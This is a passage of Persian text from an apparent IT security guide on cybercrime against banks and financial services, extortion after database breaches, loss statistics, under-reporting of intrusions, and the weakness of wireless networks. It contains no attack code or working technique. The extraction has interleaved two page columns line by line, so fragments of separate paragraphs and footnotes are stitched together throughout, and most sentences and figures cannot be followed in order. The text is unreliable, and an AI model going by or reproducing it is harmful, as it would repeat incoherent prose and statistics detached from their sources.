‫‪ www.astalavista.box.sk‬ﻭ ﻳﺎ ‪www.attrition.org‬‬ ‫ﺗﻮﻟﻴﺪ ﺁﻧﻬﺎ ﻧﻴﺰ ﺳﺎﺩﻩﺗﺮ ﺍﺳـﺖ ﺟـﺎﻳﮕﺰﻳﻦ ﻧﻤـﻮﺩﻩﺍﻧـﺪ‪ .‬ﺍﻟﺒﺘـﻪ ﺍﻳـﻦ‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎ ﻭ ﻭﻳﺮﻭﺳﻬﺎﻱ ﻣﺨﺮﺑﻲ ﺩﺍﺭﻧﺪ ﻛـﻪ ﺑـﺮﺍﻱ ﺍﻓـﺮﺍﺩ ﻣﺒﺘـﺪﻱ‬ ‫ﺗﺤﻮﻻﺕ ﻣﺨﺎﻃﺮﺍﺕ ﺍﻣﻨﻴﺘﻲ ﭼﻨﺪﻱ ﻧﻴـﺰ ﺑـﻪ ﻫﻤـﺮﺍﻩ ﺩﺍﺷـﺘﻪ ﻛـﻪ‬
‫ﺍﻣﻜﺎﻥ ﻧﻔﻮﺫ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺑﺎﻧﻜﻲ ﺭﺍ ﻓﺮﺍﻫﻢ ﻣﻲﺁﻭﺭﻧـﺪ‪ .‬ﺷـﺮﻛﺖ‬ ‫ﺑﻌﻀﻲ ﺍﺯ ﺁﻧﻬﺎ ﺑﺴﻴﺎﺭ ﺟﺪﻱ ﻫﺴﺘﻨﺪ‪.‬‬
‫‪ (www.idc.com) Internet Data Center‬ﺍﺧﻴـــﺮﹰﺍ ﺩﺭ‬ ‫ﺗﻮﺳﻌﺔ ﻣﺪﺍﻭﻡ ﺍﻗﺘﺼﺎﺩﻱ ﻭ ﺭﺍﻫﻬﺎﻱ ﺟﺪﻳـﺪ ﺍﺭﺍﺋـﻪ ﺧـﺪﻣﺎﺕ ﻣـﺎﻟﻲ‬
‫ﮔﺰﺍﺭﺷﻲ ﺍﻋﻼﻡ ﻛـﺮﺩﻩ ﻛـﻪ ﺑـﻴﺶ ﺍﺯ ‪ %۵۷‬ﻛـﻞ ﺣﻤـﻼﺕ ﺳـﺎﻝ‬ ‫ﻣﺜﻞ ﭘﺮﻭﺗﻜﻠﻬﺎﻱ ﺑﻲﺳﻴﻢ‪ ،‬ﺑﺮﺍﻱ ﺑﺎﻧﻜﻬـﺎ ﺍﻳـﻦ ﺍﻣﻜـﺎﻥ ﺭﺍ ﺑﻮﺟـﻮﺩ‬
‫ﮔﺬﺷﺘﻪ‪ ،‬ﻣﺘﻮﺟﻪ ﺑﺨﺸﻬﺎﻱ ﻣﺎﻟﻲ ﺑﻮﺩﻩ ﺍﺳﺖ‪.‬‬ ‫ﺁﻭﺭﺩﻩﺍﻧﺪ ﻛﻪ ﺑﺘﻮﺍﻧﻨﺪ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺭﺍ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺍﺭﺍﺋﻪ ﻛﻨﻨـﺪ؛ ﺍﻣـﺎ‬
‫ﻣﺨﺎﻃﺮﺍﺕ ﺳﻨﺘﻲ ﺳﺎﻟﻬﺎﻱ ﮔﺬﺷﺘﻪ ﻣﺘﺤـﻮﻝ ﺷـﺪﻩﺍﻧـﺪ‪ .‬ﺩﺭ ﻃـﻮﻝ‬ ‫ﻧﻜﺘﻪ ﺍﻳﻨﺠﺎﺳﺖ ﻛﻪ ﺍﻳﻦ ﻣﻮﻗﻌﻴﺘﻬﺎ ﻣﺤـﺪﻭﺩ ﺑـﻪ ﺍﻗﺘـﺼﺎﺩ ﺭﺳـﻤﻲ‬
‫ﺗﺎﺭﻳﺦ ﺗﺎ ﻛﻨﻮﻥ ﻛﻼﻫﺒﺮﺩﺍﺭﻳﻬﺎ ﻫﻤـﻮﺍﺭﻩ ﺷـﺎﻣﻞ ﺳـﻮﺀ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ‬ ‫ﻧﻴﺴﺘﻨﺪ‪ .‬ﺩﺭ ﻛﻨﺎﺭ ﺍﻳﻦ ﭘﻴـﺸﺮﻓﺘﻬﺎ ﺍﻗﺘـﺼﺎﺩ ﺯﻳﺮﺯﻣﻴﻨـﻲ ﻭ ﻣﺠﺮﻣﺎﻧـﻪ‬
‫ﺍﺳﻨﺎﺩ ﭼـﺎﭘﻲ ﻳـﺎ ﺳـﻮﺀ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻓـﺮﺍﺩ ﺑـﻮﺩﻩ‪ ،‬ﺍﻣـﺎ ﺩﺭ ﻣﺤـﻴﻂ‬ ‫ﺟﻬﺎﻧﻲ ﻫﻢ ﺗﻮﺍﻧﺴﺘﻪ ﺑﻪ ﺧﻮﺑﻲ ﺧﻮﺩ ﺭﺍ ﺑﺎ ﻓﻨﺎﻭﺭﻱ ﻭﻓﻖ ﺩﻫﺪ‪ .‬ﺍﺭﺍﺋﻪ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻓﺮﺻﺘﻬﺎﻱ ﺟﺪﻳﺪﻱ ﺑﺮﺍﻱ ﺟﺮﺍﺋﻢ ﺍﻗﺘـﺼﺎﺩﻱ ﺑﻮﺟـﻮﺩ‬ ‫ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺑﻮﺳﻴﻠﺔ ﺭﺳﺎﻧﻪﻫﺎﻱ ﺑﻲﺳـﻴﻢ ﻓﺮﺻـﺘﻬﺎﻳﻲ ﺭﺍ ﺑـﺮﺍﻱ‬
‫ﺁﻣــﺪﻩ ﺍﺳــﺖ‪ .‬ﺩﺭ ﺳــﺎﻝ ‪ ۲۰۰۱‬ﺑــﻴﺶ ﺍﺯ ﻳــﻚ ﭼﻬــﺎﺭﻡ )‪(%۲۷‬‬
‫‪١٤٧‬‬
‫ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩﻫﺎﻱ ﺑﺎﻧﻜﻲ ﻭ ﻣﺎﻟﻲ ﻣﻮﺭﺩ ﺩﺳﺘﺒﺮﺩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪﺍﻧـﺪ‪.‬‬
‫ﺑﺎﻧﺪﻫﺎﻱ ﻧﻔﻮﺫﮔﺮﺍﻥ ﺍﺭﻭﭘﺎﻱ ﺷﺮﻗﻲ ﺻﺪﻫﺎ ﺑﺎﻧـﻚ ﺭﺍ ﺩﺭ ﺳﺮﺗﺎﺳـﺮ‬ ‫‪144 Box 1 of "E-Finance in Emerging Markets: Is‬‬
‫‪Leapfrogging Possible?", Claessens S., T.‬‬
‫ﺟﻬﺎﻥ ﻣﻮﺭﺩ ﺩﺳـﺘﺒﺮﺩ ﻗـﺮﺍﺭ ﺩﺍﺩﻩﺍﻧـﺪ‪ .‬ﺩﺭﺣـﺎﻝ ﺣﺎﺿـﺮ ﺩﺭ ﺟـﺮﺍﺋﻢ‬ ‫‪Glaessener, D. Klingebiel, 2001.‬‬
‫‪ ۱۴۵‬ﻗﺴﻤﺖ ﺍﻭﻝ ﻛﺘﺎﺏ‪:‬‬
‫‪"E-Finance in Emerging Markets: Is‬‬
‫‪146 Dialup ATM‬‬ ‫‪Leapfrogging Possible?", 2001.‬‬
‫‪147 Evans Data Corp. Survey‬‬ ‫ﺑﻪ ﻗﻠﻢ‪Claessens. S,T. Glaessner, D. Klingebiel‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪١٨٨‬‬

‫ﻧﮕﺮﺍﻧﻲ ﺍﺯ ﻟﻜﻪﺩﺍﺭ ﺷﺪﻥ ﻭﺟﻬﺔ ﻋﻤﻮﻣﻲ ﺧﻮﺩ‪ ،‬ﺍﺯ ﮔﺰﺍﺭﺵ ﺁﺳـﻴﺒﻬﺎ‬ ‫ﺳﺎﺯﻣﺎﻧﻴﺎﻓﺘﻪ‪ ،‬ﻧﻔﻮﺫ ﺑﻌﻨﻮﺍﻥ ﻣﺪﻟﻲ ﺑﺮﺍﻱ ﻛﺴﺐ ﻭ ﻛﺎﺭ ﻣﻄﺮﺡ ﺍﺳﺖ‪.‬‬
‫ﻭ ﺿﺮﺭﻫﺎﻱ ﻭﺍﺭﺩﻩ ﺑﻴﻤﻨﺎﻙ ﻫﺴﺘﻨﺪ؛ ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﺁﺳﻴﺐﭘﺬﻳﺮ ﻣﺎﻧﺪﻥ‬ ‫ﺑﺨﺶ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ‪ FBI‬ﺍﻋﻼﻡ ﻛﺮﺩﻩ ﻛـﻪ ﺍﻛﺜـﺮ ﺑﺎﻧﻜﻬـﺎ ﺑـﻪ‬
‫ﺭﺍ ﺗﺮﺟﻴﺢ ﻣﻲﺩﻫﻨﺪ‪ .‬ﺍﮔﺮ ﻣﺸﺨﺺ ﺷﻮﺩ ﻛﻪ ﻳﻚ ﺑﻨﮕﺎﻩ ﺍﻗﺘـﺼﺎﺩﻱ‬ ‫ﻋﻠــﺖ ﺗــﺮﺱ ﺍﺯ ﺑــﻲﺁﺑﺮﻭﻳــﻲ ﻭ ﺍﺯ ﺩﺳــﺖ ﺩﺍﺩﻥ ﻣــﺸﺘﺮﻳﺎﻥ‪ ،‬ﺑــﺎﺝ‬
‫ﻫﺪﻑ ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ‪ ،‬ﻣﺸﺘﺮﻳﺎﻥ ﻣﻤﻜﻦ ﺍﺳﺖ‬ ‫ﻣﻲ ﭘﺮﺩﺍﺯﻧﺪ‪ .‬ﺍﺧﺎﺫﻱ ‪ Egghead‬ﺩﺭ ﺳﺎﻝ ﮔﺬﺷـﺘﻪ ﻳـﻚ ﻧﻤﻮﻧـﺔ‬
‫ﺍﻋﺘﻤـﺎﺩ ﺧــﻮﺩ ﺭﺍ ﺍﺯ ﺩﺳــﺖ ﺑﺪﻫﻨــﺪ ﻭ ﺍﺯ ﺁﻥ ﭘــﺲ ﻣﺎﻳــﻞ ﻧﺒﺎﺷــﻨﺪ‬ ‫ﻣﺸﻬﻮﺭ ﺍﺳﺖ‪ ،‬ﻛـﻪ ﺩﺭ ﺁﻥ ﻧﻔـﻮﺫﮔﺮﺍﻥ ﭘﺎﻳﮕـﺎﻩ ﺩﺍﺩﻩﺍﻱ ﺷـﺎﻣﻞ ﺩﻩ‬
‫ﺍﻃﻼﻋﺎﺗﺸﺎﻥ ﺩﺭ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺁﻥ ﺑﻨﮕـﺎﻩ ﺫﺧﻴـﺮﻩ ﺷـﻮﺩ‪ .‬ﺿـﺮﻭﺭﻱ‬ ‫ﻫﺰﺍﺭ ﺷﻤﺎﺭﺓ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﺭﺍ ﻣﻮﺭﺩ ﺣﻤﻠﻪ ﻗـﺮﺍﺭ ﺩﺍﺩﻧـﺪ ﻭ ﺑـﺮﺍﻱ‬
‫ﺍﺳﺖ ﻛﻪ ﺍﺭﺍﺋﻪﺩﻫﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﺍﻗﺘﺼﺎﺩﻱ‪ ،‬ﺳﻴﺴﺘﻤﻬﺎﻱ ﺧـﻮﺩ ﺭﺍ‬ ‫ﺍﻳﻨﻜﻪ ﺁﻧﻬﺎ ﺭﺍ ﺩﺭ ﻳﻚ ﺍﺗﺎﻕ ﮔﻔﺘﮕﻮﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ ﻣﻨﺘﺸﺮ ﻧﻜﻨﻨﺪ ﻣﺒﻠﻎ‬
‫ﺑﻪ ﻧﺤﻮﻱ ﻛﻨﺘﺮﻝ ﻛﻨﻨﺪ ﻛﻪ ﺿـﺎﻣﻦ ﺍﻣﻨﻴـﺖ ﺁﻧﻬـﺎ ﺑﺎﺷـﺪ‪ .‬ﺭﺳـﺎﻧﺔ‬ ‫ﮔﺰﺍﻓﻲ ﺭﺍ ﺍﺯ ﺷﺮﻛﺖ ﻣﺰﺑﻮﺭ ﺑﺎﺝﺧﻮﺍﻫﻲ ﻛﺮﺩﻧﺪ‪ .‬ﺑﻌـﺪ ﺍﺯ ﺁﻥ ﻧﻴـﺰ ﺩﺭ‬
‫ﺑﻲﺳﻴﻢ ‪ -‬ﻛﻪ ﺩﺭ ﺗﻤﺎﻡ ﺟﻬﺎﻥ ﺩﺭﺣـﺎﻝ ﺗﻮﺳـﻌﻪ ﺍﺳـﺖ ‪ -‬ﺭﺳـﺎﻧﺔ‬ ‫ﺷﺐ ﻛﺮﻳﺴﻤﺲ ﺍﺯ ﻣﻮﺟـﻮﺩﻱ ﻫـﺮ ﻛـﺎﺭﺕ ﻣﺒﻠـﻎ ﻛـﻮﭼﻜﻲ ﻛـﻢ‬
‫ﺍﻣﻨﻲ ﻧﻴﺴﺖ‪ .‬ﺷﺘﺎﺏ ﭼﺸﻤﮕﻴﺮ ﻛﺸﻮﺭﻫﺎ ﺟﻬﺖ ﺳﺎﺯﮔﺎﺭﻱ ﺑﺎ ﺑـﺴﺘﺮ‬ ‫ﻛﺮﺩﻧﺪ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﻣﺸﻜﻞ ﻓﺮﺍﺗﺮ ﺍﺯ ﻣﺴﺎﺋﻞ ﻣﺎﻟﻲ ﻭ ﺣﻴﺜﻴﺘـﻲ ﺍﺳـﺖ‪.‬‬
‫ﻓﻨﺎﻭﺭﻱ ﺑﻲﺳﻴﻢ ﺳﺮﮔﺮﺩﺍﻧﻲ ﺑﺰﺭﮔﻲ ﺍﻳﺠﺎﺩ ﻛﺮﺩﻩ ﺍﺳﺖ‪.‬‬ ‫ﻳﻚ ﭘﻴﺶ ﺑﻴﻨﻲ ﺣﺎﻛﻲ ﺍﺯ ﺍﻳﻦ ﺍﻣـﺮ ﺍﺳـﺖ ﻛـﻪ ﺣـﻮﺍﺩﺙ ﺳـﺮﻗﺖ‬
‫ﻫﻮﻳﺖ ﺩﺭ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺑـﻴﺶ ﺍﺯ ﺳـﻪ ﺑﺮﺍﺑـﺮ ﺧﻮﺍﻫـﺪ ﺷـﺪ ﻭ ﺍﺯ‬
‫ﺝ‪ .‬ﺷﺒﻜﻪﻫﺎﻱ ﺑﻲﺳﻴﻢ ﻣﺤﻠﻲ‬ ‫‪ ۷۰۰,۰۰۰‬ﺩﻻﺭ‪ ١٤٨‬ﺩﺭ ﺳﺎﻝ ﮔﺬﺷﺘﻪ ﺑﻪ ‪ ۱،۷‬ﻣﻴﻠﻴﻮﻥ ﺩﻻﺭ ﺩﺭ ﺳﺎﻝ‬
‫ﺷﺒﻜﻪﻫﺎﻱ ﺑﻲﺳﻴﻢ ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺑـﻪ ﺳـﻪ ﺷـﻜﻞ ﺩﺭ ﺩﺳـﺘﺮﺱ‬ ‫‪ ۲۰۰۵‬ﺧﻮﺍﻫﺪ ﺭﺳـﻴﺪ؛ ﻭ ﻫﺰﻳﻨـﺔ ﺑﻨﮕﺎﻫﻬـﺎﻱ ﺍﻗﺘـﺼﺎﺩﻱ ﻫـﻢ ﺑـﺎ‬
‫ﻣﻲﺑﺎﺷﻨﺪ‪ :‬ﺷﺒﻜﻪﻫﺎﻱ ﺑﻲﺳﻴﻢ ﻣﺤﻠﻲ ﻛﻪ ﺍﺯ ﭘﺮﻭﺗﻜﻞ ‪802.11b‬‬
‫ﺍﻓﺰﺍﻳﺶ ‪ %۳۰‬ﺍﺯ ﻣـﺮﺯ ‪ ۸‬ﻣﻴﻠﻴـﻮﻥ ﺩﻻﺭ ﺩﺭ ﺳـﺎﻝ ‪ ۲۰۰۵‬ﺧﻮﺍﻫـﺪ‬
‫‪١٤٩‬‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ؛ ﺷﺒﻜﻪﻫﺎﻱ ‪) CDMA/TDMA/GSM‬ﺗﻠﻔـﻦ‬
‫ﮔﺬﺷﺖ‪.‬‬
‫ﻫﻤﺮﺍﻩ ﻭ ‪ (PCS‬ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺩﺭ ﺗﻠﻔﻨﻬﺎﻱ ﺑﻲﺳﻴﻢ ﻭ ‪PDA‬ﻫـﺎ؛ ﻭ‬ ‫ﺟــﺮﺍﺋﻢ ﺳــﺎﻳﺒﺮ ﺭﺷــﺪ ﭼــﺸﻢﮔﻴــﺮﻱ ﺩﺍﺷــﺘﻪ ﺍﺳــﺖ‪ .‬ﺣﻤﻠــﻪ ﺑــﻪ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺎﻳﻜﺮﻭ ﻭﻳﻮ ﭘﺮﻗﺪﺭﺕ ﻛﻪ ﺩﺭ ﺷﺮﻛﺘﻬﺎﻱ ﺗﻠﻔﻦ ﺟﻬـﺖ‬ ‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ ﺩﺭ ﺳﺎﻝ ‪ ۲۰۰۱‬ﻧﺴﺒﺖ ﺑﻪ ﺳﺎﻝ ‪ ۲۰۰۰‬ﺩﻭ ﺑﺮﺍﺑﺮ‬
‫ﺗﺒﺎﺩﻝ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻣﺴﺎﻓﺘﻬﺎﻱ ﻃﻮﻻﻧﻲ ﻛﺎﺭﺑﺮﺩ ﺩﺍﺭﻧﺪ‪ .‬ﺑـﺎ ﺍﻳﻨﻜـﻪ‬ ‫ﺷﺪﻩ ﻭ ﺣﺪﻭﺩ ‪ %۹۰‬ﺷﺮﻛﺘﻬﺎﻳﻲ ﻛﻪ ﻣﻮﺭﺩ ﺑﺮﺭﺳـﻲ ﻗـﺮﺍﺭ ﮔﺮﻓﺘﻨـﺪ‬
‫ﻫﺮ ﺳﻪ ﻣﻮﺭﺩ ﻓﻮﻕ ﺩﺭ ﺳﺮﺍﺳﺮ ﺩﻧﻴﺎ ﻣﻌﻤﻮﻝ ﻫـﺴﺘﻨﺪ‪ ،‬ﺍﻣـﺎ ﻫﻤﮕـﻲ‬ ‫ﻋﻠﻴـﺮﻏﻢ ﺑﺮﺧـﻮﺭﺩﺍﺭﻱ ﺍﺯ ﺍﻧـﻮﺍﻉ ﻭﻳـﺮﻭﺱﻳﺎﺑﻬـﺎ‪ ،‬ﺑـﻪ ﻭﻳﺮﻭﺳــﻬﺎ ﻭ‬
‫ﻳﻚ ﻧﻘﻄﻪﺿﻌﻒ ﺍﺳﺎﺳﻲ ﺍﻣﻨﻴﺘﻲ ﺩﺍﺭﻧﺪ ﻭ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﺮﻛﺎﻧﺲ‬ ‫ﻛﺮﻣﻬﺎﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺁﻟﻮﺩﻩ ﺷـﺪﻩ ﺑﻮﺩﻧـﺪ‪ ١٥٠.‬ﺗﺤﻘﻴـﻖ ﺳـﺎﻝ ‪۲۰۰۱‬‬
‫ﺭﺍﺩﻳﻮﻳﻲ )‪ (RF‬ﺑﺮﺍﻱ ﺍﻧﺘﻘﺎﻝ ﺍﻃﻼﻋﺎﺕ ﺍﺳﺖ؛ ﭼﺮﺍﻛﻪ ﺍﻳﻦ ﻣـﺴﺌﻠﻪ‬ ‫‪ CSI/FBI‬ﺩﺭ ﻣﻮﺭﺩ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﻭ ﺍﻣﻨﻴﺘـﻲ ﻧـﺸﺎﻥ ﺩﺍﺩ ﻛـﻪ‬
‫ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺍﻓﺸﺎﻱ ﺩﺍﺩﻩﻫﺎﻱ ﺍﻧﺘﻘﺎﻟﻲ ﺑﻴﺎﻧﺠﺎﻣﺪ‪.‬‬ ‫ﺑﺪﻟﻴﻞ ﻧﻔﻮﺫﻫﺎ ﺑﻴﺶ ﺍﺯ ‪ ۳۷۷‬ﻣﻴﻠﻴﻮﻥ ﺩﻻﺭ ﺧﺴﺎﺭﺕ ﺑﻪ ﺑـﺎﺭ ﺁﻣـﺪﻩ‬
‫‪١٥١‬‬
‫ﺷﺒﻜﻪ ﻫﺎﻱ ﺑﻲﺳﻴﻢ ﺑﺼﻮﺭﺕ ﺍﻧﻔﺠـﺎﺭﻱ ﮔـﺴﺘﺮﺵ ﭘﻴـﺪﺍ ﻛﺮﺩﻧـﺪ‪.‬‬ ‫ﺍﺳﺖ‪.‬‬
‫ﻱ ﻣﺪﺍﻭﻡ ﺍﺗـﺼﺎﻻﺕ ﺑﺎﻋـﺚ‬ ‫ﻲ ﻧﺼﺐ ﻭ ﺑﺮﻗﺮﺍﺭ ﹺ‬
‫ﻫﺰﻳﻨﺔ ﻧﺎﭼﻴﺰ‪ ،‬ﺳﺎﺩﮔ ﹺ‬ ‫ﺩﻟﻴﻞ ﺍﺻﻠﻲ ﻋﺪﻡ ﺑﺮﺧﻮﺭﺩ ﻣﻨﺎﺳﺐ ﺑﺎ ﺍﻳﻦ ﺩﺳﺘﻪ ﺣـﻮﺍﺩﺙ ﺩﺭ ﺩﻧﻴـﺎ‬
‫ﮔﺴﺘﺮﺵ ﺳﺮﻳﻊ ﺁﻧﻬﺎ ‪ -‬ﺑﺨﺼﻮﺹ ﺩﺭ ﻣﺆﺳﺴﺎﺕ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ‪-‬‬ ‫ﺗﺮﺱ ﺍﺯ ﺍﻧﺘﺸﺎﺭ ﺍﺧﺒﺎﺭ ﺁﻧﻬـﺎ ﺍﺳـﺖ‪ ١٥٢.‬ﺷـﺮﻛﺘﻬﺎﻱ ﻣـﺎﻟﻲ ﺑـﺪﻟﻴﻞ‬
‫ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺩﺭ ﻭﺍﻗﻊ ﮔﻤﺎﻥ ﻣﻲﺭﻓﺖ ﻛـﻪ ﺷـﺒﻜﻪﻫـﺎﻱ ﺑـﻲﺳـﻴﻢ‬
‫ﻫﻤﺎﻥ ﻛﺎﺭﺑﺮﺩ ﺷﺒﻜﻪﻫـﺎﻱ ﺳـﻨﺘﻲ ﺭﺍ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻨﺪ ﺍﻣـﺎ ﺑـﺪﻭﻥ‬
‫‪ ۱۴۸‬ﺍﻳﻦ ﺁﻣﺎﺭ ﺗﻨﻬﺎ ﻧﻤﺎﻳﺎﻧﮕﺮ ﺟﻬﺘﮕﻴﺮﻱ ﺳﺎﻻﻧﻪ ﺩﺭ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻛﺎﺑﻞ‪ .‬ﮔﺴﺘﺮﺵ ﺍﻳﻦ ﺷﺒﻜﻪﻫـﺎ ﺑـﺪﻟﻴﻞ ﺳـﻬﻮﻟﺖ ﻛـﺎﺭ‬ ‫‪ ۱۴۹‬ﺍﻳﻦ ﻧﺘﺎﻳﺞ ﺩﺭ ﮔﺰﺍﺭﺷﻲ ﺍﺯ ﻣﺆﺳﺴﺔ ‪Celent Communications‬‬
‫ﻛــﺎﺭﺑﺮﺍﻥ ﺍﺳــﺖ ﻭ ﺩﺭﺣــﺎﻝ ﺣﺎﺿــﺮ ﺩﺭ ﺍﻳــﺎﻻﺕ ﻣﺘﺤــﺪﻩ ﺗﺤــﺖ‬ ‫ﺩﺭ ﺳﺎﻝ ‪ ۲۰۰۱‬ﻣﻨﺘﺸﺮ ﺷﺪ ﻭ ﺩﺭ ﺁﻥ ﺍﺯ ﺩﺍﺩﻩﻫﺎﻱ ‪ FTC‬ﺍﺳـﺘﻔﺎﺩﻩ ﺷـﺪﻩ‬
‫ﺍﺳﺖ‪.‬‬
‫‪150 http://www.infosecuritymag.com/articles/‬‬
‫‪october01/images/survey.pdf‬‬
‫ﺿﺮﺭﻫﺎﻱ ﻣﺎﻟﻲ ﺑﻴﺶ ﺍﺯ ﻣﻘﺪﺍﺭﻱ ﺍﺳﺖ ﻛﻪ ﮔﺰﺍﺭﺵ ﻣﻲﺷﻮﺩ‪ .‬ﺑﺮ ﺍﺳـﺎﺱ‬ ‫‪ ۱۵۱‬ﻧﻤﺎﻳﻨﺪﺓ ﻭﻳﮋﺓ ﺁﻧﺰﻣﺎﻥ ﺩﺭ ﺳـﺮﻭﻳﺲ ﻣﺨﻔـﻲ ﺟـﺮﺍﺋﻢ ﻣـﺎﻟﻲ‪James ،‬‬
‫ﺗﺠﺮﺑﺔ ﻣﻦ ﺷﺮﻛﺘﻬﺎﻳﻲ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﻣﺎﻳﻞ ﻧﻴﺴﺘﻨﺪ ﺿﺮﺭﻫﺎﻱ ﻧﺎﺷﻲ ﺍﺯ‬ ‫‪ ،Savage‬ﮔﻔﺘــﻪ‪" :‬ﺍﻳــﻦ ﺁﻣــﺎﺭ ﺣﻜﺎﻳــﺖ ﺍﺯ ﺍﺷــﻜﺎﻻﺕ ﺟــﺪﻱ ﺩﺭ‬
‫ﻣﻮﺭﺩ ﻧﻔﻮﺫ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻦ ﺧﻮﺩ ﺭﺍ ﮔﺰﺍﺭﺵ ﻛﻨﻨﺪ‪ .‬ﺑﻨﻈﺮ ﻣﻦ ﺳﺎﻝ ﺑـﻪ ﺳـﺎﻝ‬ ‫ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴﺎﺗﻲ ﺍﺳﺖ‪ ،‬ﭼﺮﺍﻛﻪ ﻣﻌﻨـﻲ ﺁﻥ ﺍﻳـﻦ ﺍﺳـﺖ ﻛـﻪ ﺟﺎﻣﻌـﺔ‬
‫ﻣﻲﺗﻮﺍﻥ ﺍﻓـﺰﺍﻳﺶ ﺯﻳـﺎﺩﻱ ﺩﺭ ﺯﻳـﺎﻥ ﺷـﺮﻛﺘﻬﺎ ﺍﺯ ﺁﺳـﻴﺒﻬﺎﻱ ﺍﻳﻨﭽﻨﻴﻨـﻲ‬ ‫ﺗﺠﺎﺭﻱ ﺗﻤﺎﻳﻞ ﺩﺍﺭﺩ ﺑﭙﺬﻳﺮﺩ ﻛﻪ ﺍﺯ ﺍﻳﻦ ﻧﻈـﺮ ﺁﺳـﻴﺐ ﺩﻳـﺪﻩ "‪ .‬ﺍﻭ ﻣﻌﺘﻘـﺪ‬
‫ﻣﺸﺎﻫﺪﻩ ﻛﺮﺩ‪ ،‬ﭼﺮﺍﻛﻪ ﺷﺮﻛﺘﻬﺎ ﺑﻴﺸﺘﺮ ﺑﻪ ﺍﻳﻦ ﻧﺘﻴﺠﻪ ﺭﺳﻴﺪﻩﺍﻧﺪ ﻛـﻪ ﻫـﺮ‬ ‫ﺍﺳﺖ ﻛﻪ ﺍﻳﻦ ﺁﻣﺎﺭ ﺗﻨﻬﺎ ﺑﻴﺎﻧﮕﺮ ﻳﻚ ﻗﺴﻤﺖ ﺟﺰﺋﻲ ﺍﺯ ﻭﺍﻗﻌﻴﺖ ﺁﺳـﻴﺒﻬﺎﻱ‬
‫ﻛﺲ ﻣﻤﻜﻦ ﺍﺳﺖ ﻫﺪﻑ ﻳﻚ ﺣﻤﻠﻪ ﻗﺮﺍﺭ ﺑﮕﻴـﺮﺩ‪ ،‬ﻭ ﻗﺮﺑـﺎﻧﻲ ﺷـﺪﻥ ﺩﺭ‬ ‫ﻭﺍﺭﺩﻩ ﺑﻪ ﺟﺎﻣﻌﺔ ﺗﺠﺎﺭﻱ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﻣﻲﺑﺎﺷﺪ‪ ۳) .‬ﺍﻛﺘﺒﺮ ‪(۲۰۰۳‬‬
‫ﺣﻤﻼﺕ ﺑﺘﺪﺭﻳﺞ ﻣﻮﺭﺩ ﻗﺒﻮﻝ ﻭﺍﻗﻊ ﺷﺪﻩ ﻭ ﺩﻳﮕﺮ ﺍﻧﺘﺸﺎﺭ ﺍﺧﺒﺎﺭ ﻣﺮﺑﻮﻁ ﺑـﻪ‬ ‫‪ ۱۵۲‬ﻧﻤﺎﻳﻨﺪﺓ ﻣﺨﺼﻮﺹ ‪ ،Cornelius Tate ،CERT‬ﺑﻪ ﺍﻳـﻦ ﺗﻤﺎﻳـﻞ‬
‫ﺁﻥ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﮔﺬﺷﺘﻪ ﺑﺎﻋﺚ ﺍﺯ ﺩﺳﺖ ﺭﻓﺘﻦ ﺍﻃﻤﻴﻨﺎﻥ ﻋﻤﻮﻣﻲ ﻧﻤﻲﺷﻮﺩ‪".‬‬ ‫ﺑﻪ ﮔﺮﻳﺰ ﺍﺯ ﮔﺰﺍﺭﺵﻛﺮﺩﻥ ﺭﺧﺪﺍﺩﻫﺎ ﺍﻳﻨﮕﻮﻧﻪ ﺍﺷﺎﺭﻩ ﻣﻲﻛﻨﺪ‪" :‬ﻓﻜﺮ ﻣﻲﻛﻨﻢ‬
